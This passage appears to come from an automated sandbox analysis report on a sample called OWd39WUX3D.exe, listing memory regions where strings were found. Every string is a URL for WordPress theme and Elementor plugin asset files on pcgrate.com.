OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
